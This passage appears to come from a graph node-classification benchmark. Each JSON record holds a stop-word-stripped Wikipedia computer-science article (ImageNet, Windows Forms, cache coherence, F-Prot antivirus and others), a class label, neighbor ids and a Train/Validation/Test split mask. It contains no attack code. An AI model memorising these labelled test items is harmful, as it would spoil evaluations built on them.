4.4bsd-lite release",
    "neighbors": [
      11232,
      5506,
      5380,
      7204,
      8266,
      8395,
      9452,
      1839,
      7983,
      9135,
      2035,
      5492,
      7702,
      5534,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 2585,
    "label": 9,
    "text": "First-class_citizen:first-class citizen programming language design first-class citizen also type object entity value given programming language entity supports operations generally available entities operations typically include passed argument returned function modified assigned variable concept first- second-class objects introduced christopher strachey 1960s actually define term strictly contrasted real numbers procedures algol first second class objects algol real number may appear expression assigned variable either may appear actual parameter procedure call procedure hand may appear another procedure call either operator common case one actual parameters expressions involving procedures whose results procedures thus sense procedures algol second class citizens—they always appear person never represented variable expression except case formal parameter ... robin popplestone gave following definition items certain fundamental rights 1990s raphael finkel proposed definitions second third class values definitions widely adopted simplest scalar data types integer floating-point numbers nearly always first-class many older languages arrays strings first-class assigned objects passed parameters subroutine example neither fortran iv c supports array assignment passed parameters position first element actually passed—their size lost c appears support assignment array pointers fact simply pointers array first element carry array size languages data types first-class objects though object-oriented languages classes first-class objects instances metaclasses languages support continuations goto-labels objects let alone first-class objects many programming languages support passing returning function values applied arguments whether suffices call function values first-class disputed authors require possible create new functions runtime call 'first-class result functions c first-class objects instead sometimes called second-class objects still manipulated fashions via function pointers smalltalk functions methods first-class objects like smalltalk classes since smalltalk operators etc methods also first-class objects languages java php explicit reflection subsystem allow access internal implementation structures even though accessible manipulable way ordinary objects",
    "neighbors": [
      512,
      9730,
      11269,
      3462,
      8587,
      2062,
      5783,
      9245,
      3876,
      5165,
      2556,
      11457,
      4034,
      8644,
      2501,
      8262,
      10569,
      5456,
      10581,
      727,
      10712,
      7386,
      11610,
      8924,
      7392,
      1889,
      10083,
      10470,
      2666,
      3051,
      8554,
      2936,
      3705,
      1019,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2586,
    "label": 3,
    "text": "Directory-based_cache_coherence:directory-based cache coherence computer engineering directory-based cache coherence type cache coherence mechanism directories used manage caches place snoopy methods due scalability snoopy bus-based methods scale poorly due use broadcasting methods used target performance scalability directory systems full bit vector format possible cache line memory bit used track whether every individual processor line stored cache full bit vector format simplest structure implement least scalable sgi origin 2000 uses combination full bit vector coarse bit vector depending number processors directory entry must 1 bit stored per processor per cache line along bits tracking state directory leads total size required number processors ×number cache lines storage overhead ratio number processors cache block size×8 observed directory overhead scales linearly number processors may fine small number processors implemented large systems size requirements directory becomes excessive example block size 32 bytes 1024 processors storage overhead ratio becomes 1024/ 32×8 400 coarse bit vector format similar structure full bit vector format though rather tracking one bit per processor every cache line directory groups several processors nodes storing whether cache line stored node rather line improves size requirements expense bus traffic saving processors per node × total lines bits space thus ratio overhead replacing number processors number processor groups bus request made cache line one processor group directory broadcasts signal every processor node rather caches contain leading unnecessary traffic nodes n't data cached case directory entry uses 1 bit group processors cache line example full bit vector format consider 1 bit 8 processors group storage overhead 128/ 32×8 =50 significant improvement full bit vector format cache stores small subset blocks main memory particular time hence entries directory belong uncached blocks sparse directory format wastage reduced storing cached blocks directory.consider processor cache size 64kb block size 32 bytes main memory size 4mb maximum number entries directory sparse directory format 2048 directory entry blocks memory number entries directory 131072 thus evident storage improvement provided sparse directory format significant format directory decentralised distributed among caches share memory block different caches share memory block arranged form binary tree cache accesses memory block first root node memory block root node information head sharing counter field sc sc field number caches share block cache entry pointers next sharing caches known l-chd r-chd condition directory binary tree number balanced i.e number nodes left sub tree must equal one greater number nodes right subtree subtrees also number balanced format memory holds directory pointer latest cache accessed block cache pointer previous cache accessed block processor sends write request block memory processor sends invalidations chain pointers directory cache block replaced need traverse list order change directory increases latency order prevent doubly linked lists widely used cached copy pointers previous next cache accesses block limited pointer format uses set number pointers track processors caching data new processor caches block free pointer chosen pool point processor options handling cases number sharers exceeds number free pointers one method invalidate one sharers using pointer new requestor though costly cases block large number readers lock another method separate pool free pointers available blocks method usually effective number blocks shared large number processors normally large",
    "neighbors": [
      1776,
      7802,
      2339
    ],
    "mask": "Test"
  },
  {
    "node_id": 2587,
    "label": 4,
    "text": "Trusted_client:trusted client computing trusted client device program controlled user service restrictions designed prevent use ways authorized provider service client device vendors trust sell consumers trust examples include video games played computer network content scramble system css dvds trusted client software considered fundamentally insecure security broken one user break trivially copyable available others computer security specialist bruce schneier states average user anything works need complex security software skilled attacker hand nothing works trusted client hardware somewhat secure complete solution trusted clients attractive business form vendor lock-in sell trusted client loss charge would otherwise economically viable associated service one early example radio receivers subsidized broadcasters restricted receiving radio station modern examples include video recorders forced law include macrovision copy protection dvd region code system region-coded video game consoles technically knowledgeable consumers manufacturers frequently bypass limiting features trusted clients — simple replacement fixed tuning capacitor early locked radios successful decss cryptographic attack css 1999 manufacturers resorted legal threats via digital millennium copyright act similar laws prevent circumvention varying degrees success however nature internet enables crack discovered published virtually impossible remove trusted computing aims create computer hardware assists implementation restrictions software attempts make circumvention restrictions difficult",
    "neighbors": [
      2370,
      1315
    ],
    "mask": "Test"
  },
  {
    "node_id": 2588,
    "label": 1,
    "text": "ImageNet:imagenet imagenet project large visual database designed use visual object recognition software research 14 million images hand-annotated project indicate objects pictured least one million images bounding boxes also provided imagenet contains 20,000 categories typical category balloon strawberry consisting several hundred images database annotations third-party image urls freely available directly imagenet though actual images owned imagenet since 2010 imagenet project runs annual software contest imagenet large scale visual recognition challenge ilsvrc software programs compete correctly classify detect objects scenes challenge uses trimmed list one thousand non-overlapping classes 30 september 2012 convolutional neural network cnn called alexnet achieved top-5 error 15.3 imagenet 2012 challenge 10.8 percentage points lower runner made feasible due utilization graphics processing units gpus training essential ingredient deep learning revolution according economist suddenly people started pay attention within ai community across technology industry whole 2015 alexnet outperformed microsoft deep cnn 100 layers imagenet 2015 contest ai researcher fei-fei li began working idea imagenet 2006 time ai research focused models algorithms li wanted expand improve data available train ai algorithms 2007 li met princeton professor christiane fellbaum one creators wordnet discuss project result meeting li went build imagenet starting word-database wordnet using many features assistant professor princeton li assembled team researchers work imagenet project used amazon mechanical turk help classification images presented database first time poster 2009 conference computer vision pattern recognition cvpr florida imagenet crowdsources annotation process image-level annotations indicate presence absence object class image tigers image tigers image object-level annotations provide bounding box around visible part indicated object imagenet uses variant broad wordnet schema categorize objects augmented 120 categories dog breeds showcase fine-grained classification one downside wordnet use categories may elevated would optimal imagenet people interested lady gaga ipod mini rare kind diplodocus 2012 imagenet world largest academic user mechanical turk average worker identified 50 images per minute ilsvrc aims follow footsteps smaller-scale pascal voc challenge established 2005 contained 20,000 images twenty object classes order democratize imagenet fei-fei li proposed pascal voc team collaboration beginning 2010 research teams would evaluate algorithms given data set compete achieve higher accuracy several visual recognition tasks resulting annual competition known imagenet large scale visual recognition challenge ilsvrc ilsvrc uses trimmed list 1000 image categories classes including 90 120 dog breeds classified full imagenet schema 2010s saw dramatic progress image processing around 2011 good ilsvrc classification error rate 25 2012 deep convolutional neural net called alexnet achieved 16 next couple years error rates fell percent 2012 breakthrough combined pieces dramatic quantitative improvement marked start industry-wide artificial intelligence boom 2015 researchers microsoft reported cnns exceeded human ability narrow ilsvrc tasks however one challenge organizers olga russakovsky pointed 2015 programs identify images belonging one thousand categories humans recognize larger number categories also unlike programs judge context image 2014 fifty institutions participated ilsvrc 2015 baidu scientists banned year using different accounts greatly exceed specified limit two submissions per week baidu later stated fired team leader involved would establish scientific advisory panel 2017 29 38 competing teams greater 95 accuracy 2017 imagenet stated would roll new much difficult challenge 2018 involves classifying 3d objects using natural language creating 3d data costly annotating pre-existing 2d image dataset expected smaller applications progress area would range robotic navigation augmented reality",
    "neighbors": [
      416,
      2945,
      898,
      10658,
      37,
      1001,
      2901,
      11163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2589,
    "label": 7,
    "text": "My_Phone:phone phone online service companion mobile client application microsoft service launched october 6 2009 provided free mobile phone back-up solution wirelessly synchronizing contacts calendar appointments tasks text messages browser favorites photos music video documents password-protected online portal users could access manage information service also enabled photo sharing markets set features dealing lost phone sold premium package requiring one-time fee phone supported windows mobile os versions 6.0 6.1 6.5 available globally 25 languages service used windows live id authentication windows live server infrastructure storing user information june 8 2011 microsoft announced phone would discontinued sync phones ending august 7 2011 website access data ending october 6 2011 data contacts calendar entries text messages photos moved skydrive since rebranded onedrive microsoft announced launched beta version phone mobile world congress february 16 2009 approximately 200,000 users 200 countries beta tested service scalability features service offered following free features phone offers set premium features event lost phone features include premium features available users free service as-needed basis sold package requiring one-time fee 4.99 us package meant activated phone portal phone lost stolen long device turned connectivity package includes 7-day access 3 ring 3 map 1 lock 1 erase premium package initially free charge trial since december 2009 package supplied one free activation used time premium package available united states canada mexico united kingdom germany france italy spain portugal denmark netherlands greece poland finland norway sweden brazil australia japan singapore taiwan",
    "neighbors": [
      4704,
      11559,
      10986,
      6987,
      7983,
      6709,
      9434
    ],
    "mask": "Test"
  },
  {
    "node_id": 2590,
    "label": 0,
    "text": "SABLE:sable sable xml markup language used annotate texts speech synthesis defines tags control written words numbers sentences audibly reproduced computer sable developed informal joint project sun microsystems bell labs university edinburgh initial letters make word sable initiative combine three previous speech synthesis markup languages ssml stml jsml sable used festival speech synthesis system development sable appears stopped 2010 reached status formal standard recommended specification",
    "neighbors": [
      4768,
      1890,
      3533,
      214,
      6838,
      11004,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2591,
    "label": 3,
    "text": "Tournament_of_the_Gods:tournament gods sid enters tournament shortly crowned champion fallen angel aquross infects hideous disease requires steal life energy angels constant pain relief lies drug kills pain causes sexual urges denied sid must defeat evil aquross condensed single 35-minute episode released us subtitled white-cassette vhs pink pineapple studio mike toole comparing ova gor find interesting chris beveridge commented video strange piece good fun moments english japanese",
    "neighbors": [
      2156,
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 2592,
    "label": 3,
    "text": "N-version_programming:n-version programming n -version programming nvp also known multiversion programming multiple-version dissimilar software method process software engineering multiple functionally equivalent programs independently generated initial specifications concept n -version programming introduced 1977 liming chen algirdas avizienis central conjecture independence programming efforts greatly reduce probability identical software faults occurring two versions program aim nvp improve reliability software operation building fault tolerance redundancy general steps n -version programming n -version programming applied software switching trains performing flight control computations modern airliners electronic voting save system detection zero-day exploits among uses",
    "neighbors": [
      4987,
      9677
    ],
    "mask": "Test"
  },
  {
    "node_id": 2593,
    "label": 2,
    "text": "Microsoft_YaHei:microsoft yahei microsoft yahei sans-serif gothic typeface created founder electronics monotype corporation commission microsoft hinting font undertaken monotype imaging cjk ideographic characters designed founder electronics foundry senior designer li qi 齐立 development began 2004 microsoft commissioned beijing founder electronics co. ltd. cleartype font use simplified chinese version windows vista default font ideographs yahei based previous sans-serif font family designer made early 1990s like yahei feature flared stroke terminals changes prototype fonts include redesigning hook stroke longer end addition 'foot ending stroke terminal readjusting black white proportions glyphs introduction dents stroke path outlines intersect stroke path outlines flattening diagonal dot stroke top top glyph yahei optimized screen use font family originally includes two fonts regular bold weights named codice_1 'microsoft yahei bold separate file codice_2 opentype features include vertical writing microsoft yahei distributed windows since windows vista default user interface font language set simplified chinese aims legible simsun predecessor used cleartype also included simplified chinese version microsoft office 2007 downloading installing simplified chinese cleartype fonts windows xp microsoft also makes microsoft yahei available windows xp font file contains 20,902 original cjk unified ideographs code points specified unicode plus approximately 80 code points defined standardization administration china supports gbk character set localized glyphs semilight semibold heavy weight fonts introduced windows 10 redstone 4 spring creators update microsoft yahei ui version microsoft yahei alternate character design reduced line height introduced windows 8 part microsoft yahei update microsoft yahei ui included ttc file along microsoft yahei founder electronics versions fonts released various character sets depending family gb2312-80 simplified chinese characters gb12345-90 traditional chinese characters gbk simplified traditional chinese characters big-5 hong kong taiwan region gb18030-2000 includes gbk big-5 characters mapped unicode cjk unified ideographs extension fzlantinghei 方正兰亭黑 founder electronics variant based microsoft yahei latin glyphs changed resemble arial fzlantinghei-db fzlantinghei-b correspond font weights yahei yahei bold respectively family includes 14 font styles 10 weights 3 widths condensed extended widths h width r weights released character set fonts include gb2312-80 gb12345-90 gbk big-5 gb18030-2000 fzlantinghei 方正兰亭刊黑 based fzlantinghei designed printing family includes 1 font styles 1 weight 1 width font weight equal el middle width fzlantinghei released character set fonts include gb2312-80 gb12345-90 gbk fzlantingyuan 方正兰亭圆 based fzlantinghei rounded terminals corners elimination 'foot stroke terminals latin glyphs changed lowercase g less like arial designers included cui yan han chunli zhang zhang shao wei yan yao li xueying wang ji jie zhao yue yuan family includes 9 font styles 9 weights h eb b db1 db r l el 1 width medium released character set fonts include gb2312-80 gb12345-90 gbk fzlantinghei bronze prize 2009 dfa design asia award",
    "neighbors": [
      4130,
      9539,
      7973,
      8422,
      1098,
      4138,
      2221,
      4141,
      1487,
      6797,
      3538,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "Test"
  },
  {
    "node_id": 2594,
    "label": 3,
    "text": "Computer_display_standard:computer display standard computer display standards combination aspect ratio display size display resolution color depth refresh rate associated specific expansion cards video connectors monitors various computer display standards display modes used history personal computer often combination aspect ratio specified width-to-height ratio display resolution specified width height pixels color depth measured bits per pixel refresh rate expressed hertz associated screen resolution refresh rate display adapter earlier display adapters simple frame-buffers later display standards also specified extensive set display functions software controlled interface beyond display modes vesa industry organization defined several standards related power management device identification ergonomics standards set tco number common resolutions used computers descended original ibm pc supported families personal computers de facto standards usually originated one manufacturer reverse-engineered others though vesa group co-ordinated efforts several leading video display adapter manufacturers video standards associated ibm-pc-descended personal computers shown diagram table alongside early macintosh makes comparison early 1990s onwards manufacturers moved pc display standards thanks widely available affordable hardware although common standard prefixes super ultra indicate specific modifiers base standard resolutions several others prefixes also often combined wqxga whuxga levels stacking hindered consideration towards readability decline added x especially even defined hierarchy value s/x/u/+ modifiers",
    "neighbors": [
      134,
      9741,
      4114,
      2838,
      10658,
      6069,
      9016,
      7998,
      8514,
      1614,
      4567,
      344,
      5339,
      11487,
      9057,
      1387,
      8301,
      10862,
      11631,
      11634,
      5368,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2595,
    "label": 9,
    "text": "Olivier_Danvy:olivier danvy olivier danvy french computer scientist specializing programming languages partial evaluation continuations professor yale-nus college singapore danvy received phd degree université paris vi 1986 notable number scientific papers acknowledge help writing nature editor declan butler reports analysis acknowledgments nearly one third million scientific papers reports danvy thanked person computer science danvy quoted stunned find name top list ascribing position series coincidences multidisciplinary well travelled part international phd programme networker belongs university department long tradition many international visitors",
    "neighbors": [
      2881,
      10403,
      8262,
      10246,
      10395,
      9680,
      1783,
      10616,
      1947
    ],
    "mask": "None"
  },
  {
    "node_id": 2596,
    "label": 8,
    "text": "SAP_NetWeaver_Application_Server:sap netweaver application server sap netweaver application server sap web application server component sap netweaver works web application server sap products abap application servers including message server represent application layer multitier architecture abap-based sap system application servers execute abap applications communicate presentation components database also using message server architecture sap web application server separated 5 areas sap netweaver accept multiple forms authentication sap netweaver application server connectivity layer supports https required encrypted communications via secure socket layer possible enable ssl using sap cryptographic library company running traditional sap systems uses rfc diag protocols secure network communications required encrypted communications well",
    "neighbors": [
      1920,
      4485,
      7430,
      7175,
      1937,
      7443,
      1556,
      8350,
      7457,
      3746,
      8994,
      11682,
      3237,
      9125,
      7338,
      9387,
      44,
      11439,
      10800,
      6067,
      9909,
      6714,
      4797,
      3517,
      1991,
      11134,
      1363,
      595,
      3414,
      3545,
      5210,
      865,
      2404,
      4837,
      6379,
      9580,
      11376,
      8691,
      1780,
      10611,
      11386,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2597,
    "label": 6,
    "text": "Orlov_block_allocator:orlov block allocator orlov block allocator algorithm define particular file reside given file system blockwise speed disk operations scheme named creator grigoriy orlov first posted brief description implementation openbsd technique later used bsd fast filesystem kernel variants performance file system dependent many things one crucial factors filesystem lays files disk general best keep related items together linux ext2 ext3 filesystems instance tried spread directories cylinders disk imagine setting system users home directories /home first-level directories within /home i.e home directories numerous users placed next may space left contents directories user files thus end placed far directories contain performance suffers spreading directories disc allows files directory remain less contiguous number and/or size grows situations causes excessive spreading data disc surface essentially orlov algorithm tries spread top-level directories assumption unrelated directories created root directory filesystem considered top-level directories theodore ts added special inode flag allows system administrator mark directories top-level directories well /home lives root filesystem people set systems way simple codice_1 command make system treat top-level directory creating directory top-level directory orlov algorithm tries put cylinder group parent little care taken however ensure directory contents also able fit cylinder group many inodes blocks available group directory placed different cylinder group resources available result hopefully much better locality files truly related likely accessed together orlov block allocator shown offer performance gains workloads traverse directory trees freebsd one benchmark result ext3 new allocator seems posted results promising time required traverse linux kernel tree reduced roughly 30 orlov scheme needs rigorous benchmarking also needs serious stress testing demonstrate performance degrade filesystem changed time",
    "neighbors": [
      2432,
      9762,
      8772,
      5256,
      4298,
      8298,
      6352,
      2197,
      246,
      2199,
      6808
    ],
    "mask": "Train"
  },
  {
    "node_id": 2598,
    "label": 2,
    "text": "Communications_ToolBox:communications toolbox communications toolbox generally shortened comm toolbox ctb suite application programming interfaces libraries device drivers classic mac os implemented wide variety serial network communication protocols using ctb one could write application would seamlessly work appletalk modem variety connections developers could also write plug-in communications modules known tools allowing ctb-aware application use connection method ctb notoriously slow buggy received mixed support developers examples applications using simple tasks common many target uses like terminal emulators almost always ran faster designed target single connection type avoid ctb ctb based shared library concept era mac os include shared library system instead ctb wrote driver manager layer communications resource manager resource manager responsible installing managing various drivers tools provided various functions within ctb system three primary types tools associated manager connection manager handled communications drivers opened channels remote services terminal manager managed tools implemented character conversion command string interpretation needed support sort terminal emulator file transfer manager sort file transfer protocol applications could use managers ctb typical terminal emulator would use connecting tool selected connection manager another terminal manager periodically using file transfer manager user request case common terminal emulators like versaterm macterminal however another application might use one say connection manager set communications quickmail eudora well-known examples applications typically used gui elements supplied managers handle user interaction could also enumerate tools provide custom gui perhaps best known tool apple modem tool provided serial communications drivers well system storing setup commands connection initiated using modem tool link modem opened commands sent link established dialling modem tool also indicative problems ctb general slow lacking features quickly became outdated modem speeds improved saw little development effort support 1.5 version addressing problems released 1993 even finding proved difficult update needed support higher speeds 28kbit/s modems become common apple also produced simple serial tool appletalk tools additional connection methods tty vt102 tools terminal emulation text xmodem tools file transfers third party tools common supporting connections including teleport modem plugged apple desktop bus thus required custom drivers apple x.25 isdn tools variety examples",
    "neighbors": [
      576,
      1121,
      10833,
      2804
    ],
    "mask": "Test"
  },
  {
    "node_id": 2599,
    "label": 9,
    "text": "Chomski:chomski pattern parsing virtual machine previously called 'chomski noam chomsky pp pattern parser also provisional name refer command line computer language utility interpreter language used parse transform text patterns formal mathematical languages utility reads input files character character sequentially applying operation specified via command line pp script outputs line developed 2006 c language pp derived number ideas syntax elements sed command line text stream editor pattern-parser language uses many ideas taken sed unix stream editor example sed includes two virtual variables data buffers known pattern space hold space two variables constitute extremely simple virtual machine chomski language virtual machine augmented several new buffers registers along number commands manipulate buffers parsing virtual machine includes tape data structure well stack data structure along workspace equivalent sed pattern space number buffers lesser importance virtual machine designed specifically apt parsing formal languages parsing process traditionally involves two phases lexical analysis phase formal grammar phase lexical analysis phase series tokens generated tokens used input set formal grammar rule chomski virtual machine uses stack hold tokens uses tape structure hold attributes parse tokens pp script two phases lexing parsing combined one script file series command words used manipulate different data structures virtual machine purpose pp tool parse transform text patterns text patterns conform rules provided formal language include many context free languages whereas traditional unix tools awk sed grep etc process text one line time use regular expressions search transform text pp tool processes text one character time use context free grammars transform compile text however common unix philosophy pp tool works upon plain text streams encoded according locale local computer produces output another plain text stream allowing pp tool used part standard pipeline motivation creation pp tool chomski virtual machine allow writing parsing scripts rather resort traditional parsing tools lex yacc following example shows typical use pp pattern parser -e option indicates pattern parse expression follows script c multiline comments /* ... */ deleted input stream pattern parser tool designed used filter pipeline example generate data make small change replacing x however functionality currently available pp tool also includes comprehensive script viewer debugger read piped standard input several commands put together file called example substitute.pss applied using -f option read commands file besides substitution forms simple processing possible example following uses accumulator-increment command a+ count commands count number lines file complex pp constructs possible allowing serve simple highly specialised programming language pp two flow control statements apart test structures codice_1 codice_2 codice_3 etc namely .reparse .restart commands jump back parse label labels permitted idea chomski arose limitations regular expression engines use line line paradigm limitations parsing nested text patterns regular expressions chomski evolved natural progression grep sed command development began approximately 2006 continues sporadically pattern parsing script language general purpose programming language like sed designed limited type usage currently support unicode strings since current implementation uses standard c character arrays since virtual machine behind pattern parser language considerably complex sed necessary able debug scripts facility currently provided within 'pp executable",
    "neighbors": [
      9345,
      515,
      5635,
      9733,
      9735,
      3976,
      4750,
      2198,
      5399,
      6812,
      9507,
      7847,
      4398,
      7983,
      8499,
      9780,
      9911,
      1336,
      7356,
      965,
      8262,
      8522,
      3659,
      9946,
      6120,
      11625,
      5612,
      4850,
      5492,
      9204,
      6138,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 2600,
    "label": 5,
    "text": "Tradervoice:tradervoice tradervoice underlying technology pool supports real time communications brokers bankers following move electronic banking 90's key suppliers industry alphabetical order",
    "neighbors": [
      3168
    ],
    "mask": "None"
  },
  {
    "node_id": 2601,
    "label": 4,
    "text": "FRISK_Software_International:frisk software international frisk software international icelandic software company developed f-prot antivirus f-prot aves antivirus anti-spam service name derived initial letters personal name patronymic friðrik skúlason founder company founded 1993 acquired commtouch known cyren 2012 frisk software competes antivirus industry avast avira eset f-secure kaspersky mcafee panda security sophos symantec among others f-prot antivirus one oldest antivirus products first release 1989 world first heuristic engine sold home corporate packages editions windows linux bsd corporate versions microsoft exchange solaris certain ibm eservers linux bsd versions available home users free charge virus definition updates free 30-day trial versions platforms downloaded f-prot aves specifically targeted towards corporate users company also produced genealogy program called espólín púki spellchecker additional features summer 2012 frisk acquired cyren israeli-american provider security products friðrik skúlason joined cyren vice-president antivirus technologies f-prot antivirus antivirus product developed frisk software international available related versions several platforms available microsoft windows microsoft exchange server linux bsd solaris aix ibm eservers *nix scanning engine used f-prot provides signature based detection capability heuristics low use computer resources 1991 f-prot antivirus dos became world first heuristic behavior scanner f-prot dos since discontinued frisk software international allows others develop applications based scanning engine use sdk specifically released many software vendors use f-prot antivirus engine including suse sdk known today commtouch antivirus sdk friðrik skúlason also sometimes known frisk founder frisk software international one founding members caro computer antivirus research organization originally developed f-prot antivirus computer support work subsequently started company many years technical editor virus bulletin",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      6797,
      10637,
      9488,
      9364,
      4374,
      1052,
      156,
      11166,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      8614,
      8615,
      2859,
      3243,
      6699,
      7983,
      6834,
      4403,
      9523,
      10166,
      823,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      6993,
      5971,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6762,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 2602,
    "label": 0,
    "text": "Brown_clustering:brown clustering brown clustering hard hierarchical agglomerative clustering problem based distributional information proposed peter brown vincent della pietra peter desouza jennifer lai robert mercer typically applied text grouping words clusters assumed semantically related virtue embedded similar contexts natural language processing brown clustering ibm clustering form hierarchical clustering words based contexts occur proposed peter brown vincent della pietra peter desouza jennifer lai robert mercer ibm context language modeling intuition behind method class-based language model also called cluster -gram model i.e one probabilities words based classes clusters previous words used address data sparsity problem inherent language modeling jurafsky martin give example flight reservation system needs estimate likelihood bigram shanghai without seen training set system obtain good estimate cluster shanghai city names make estimate based likelihood phrases london beijing denver brown groups items i.e. types classes using binary merging criterion based log-probability text class-based language model i.e probability model takes clustering account thus average mutual information ami optimization function merges chosen incur least loss global mutual information result output thought binary tree perhaps helpfully sequence merges terminating one big class words model general form hidden markov model reduced bigram probabilities brown solution problem mi defined finding clustering maximizes likelihood data computationally expensive approach proposed brown et al greedy heuristic work also suggests use brown clusterings simplistic bigram class-based language model given cluster membership indicators tokens text probability word instance given preceding word given criticised limited utility ever predicts common word class restricted word types reflected low relative reduction perplexity found using model brown works examined trigrams approaches brown clustering problem brown clustering proposed generates fixed number output classes important choose correct number classes task-dependent cluster memberships words resulting brown clustering used features variety machine-learned natural language processing tasks generalization algorithm published aaai conference 2016 including succinct formal definition 1992 version also general form core concept classes considered merging necessarily represent final number classes output altering number classes considered merging directly affects speed quality final result known theoretical guarantees greedy heuristic proposed brown et al february 2018 however clustering problem framed estimating parameters underlying class-based language model possible develop consistent estimator model mild assumptions",
    "neighbors": [
      7780,
      4468,
      2518,
      3323,
      3998
    ],
    "mask": "Test"
  },
  {
    "node_id": 2603,
    "label": 2,
    "text": "Windows_Forms:windows forms windows forms winforms graphical gui class library included part microsoft .net framework mono framework providing platform write rich client applications desktop laptop tablet pcs seen replacement earlier complex c++ based microsoft foundation class library offer comparable paradigm acts platform user interface tier multi-tier solution microsoft connect event december 4 2018 microsoft announced releasing windows forms open source project github released mit license release windows forms become available projects targeting .net core framework however framework still available windows platform mono incomplete implementation winforms remains cross-platform implementation future development microsoft succeeded winforms xaml based gui entry using frameworks wpf uwp however drag drop placement gui components manner similar winforms still provided xaml replacing root xaml element page/window canvas ui-control making change user build window similar fashion winforms directly dragging dropping components using visual studio gui xaml provided drag drop placement backwards compatibility canvas control xaml controls similar winform controls 1-to-1 backwards compatible perform similar functions similar appearance properties methods different enough require remapping one api another windows forms application event-driven application supported microsoft .net framework unlike batch program spends time simply waiting user something fill text box click button windows forms provides access native windows user interface common controls wrapping existent windows api managed code help windows forms .net framework provides comprehensive abstraction win32 api visual basic mfc windows forms similar microsoft foundation class mfc library developing client applications provides wrapper consisting set c++ classes development windows applications however provide default application framework like mfc every control windows forms application concrete instance class visual elements windows forms class library derive control class provides minimal functionality user interface element location size color font text well common events like click drag/drop control class also docking support let control rearrange position parent microsoft active accessibility support control class also helps impaired users use windows forms better besides providing access native windows controls like button textbox checkbox listview windows forms added controls activex hosting layout arrangement validation rich data binding controls rendered using gdi+ like abstract window toolkit awt equivalent java api windows forms early easy way provide graphical user interface components .net framework windows forms built existing windows api controls merely wrap underlying windows components methods allow direct access win32 callbacks available non-windows platforms .net framework 2.0 windows forms gained richer layout controls office 2003 style toolstrip controls multithreading component richer design-time data binding support well clickonce web-based deployment release .net 3.0 microsoft released second parallel api rendering guis windows presentation foundation wpf based directx together gui declarative language called xaml question-and-answer session build 2014 conference microsoft explained windows forms maintenance mode new features added bugs found would still fixed recently improved high-dpi support various windows forms controls introduced updates .net framework version 4.5 mono project led xamarin formerly ximian novell create ecma standard compliant .net compatible set tools mono support system.windows.forms .net 2.0 announced complete also system.windows.forms 2.0 works natively mac os x however system.windows.forms actively developed mono full compatibility .net achieved possible microsoft system.windows forms mainly wrapper around windows api methods allow direct access win32 callbacks available platforms windows",
    "neighbors": [
      7175,
      2062,
      9245,
      5669,
      5165,
      5677,
      3631,
      9263,
      576,
      8771,
      10841,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      9848,
      5754,
      7292,
      1664,
      1666,
      9348,
      4231,
      6797,
      3734,
      3224,
      4777,
      2221,
      11442,
      692,
      200,
      4822,
      9943,
      9434,
      6370,
      4836,
      10470,
      3821,
      10480,
      2804,
      4853,
      9491,
      1812,
      7450,
      4384,
      9505,
      3876,
      11559,
      3881,
      10026,
      5952,
      1347,
      1348,
      8524,
      8015,
      1366,
      4439,
      10088,
      8554,
      9579,
      5492,
      9593,
      10624,
      3462,
      8582,
      3997,
      10654,
      8607,
      9128,
      8618,
      8644,
      4550,
      7629,
      5594,
      479,
      5612,
      3573,
      2045,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 2604,
    "label": 3,
    "text": "Socket_P:socket p intel socket p mpga478mn mobile processor socket replacement core microarchitecture chips core 2 duo launched may 9 2007 part santa rosa platform merom penryn processors front-side bus fsb cpus install socket p run 400 533 667 800 1066 mt/s adapting multiplier frequency cpu throttle save power given socket p cpus support eist except celeron support eist socket p 478 pins electrically pin-compatible socket socket 478 socket p also known 478-pin micro fcpga μfcpga-478 plastic grid printed mpga478mn",
    "neighbors": [
      3588,
      9611,
      5901,
      5523,
      2455,
      3992,
      3352,
      8855,
      3995,
      4252,
      11417,
      6175,
      7714,
      10019,
      4523,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 2605,
    "label": 9,
    "text": "Embedded_C:embedded c embedded c set language extensions c programming language c standards committee address commonality issues exist c extensions different embedded systems historically embedded c programming requires nonstandard extensions c language order support exotic features fixed-point arithmetic multiple distinct memory banks basic i/o operations 2008 c standards committee extended c language address issues providing common standard implementations adhere includes number features available normal c fixed-point arithmetic named address spaces basic i/o hardware addressing embedded c uses syntax semantics standard c e.g. main function variable definition datatype declaration conditional statements switch case loops functions arrays strings structures union bit operations macros etc technical report published 2004 second revision 2006",
    "neighbors": [
      8576,
      4995,
      516,
      8326,
      9366,
      154,
      1435,
      10143,
      10921,
      428,
      5165,
      3886,
      9008,
      7479,
      1849,
      321,
      6338,
      8262,
      4173,
      11219,
      4957,
      477,
      8545,
      8675,
      4964,
      10470,
      10603,
      6640,
      2804,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2606,
    "label": 3,
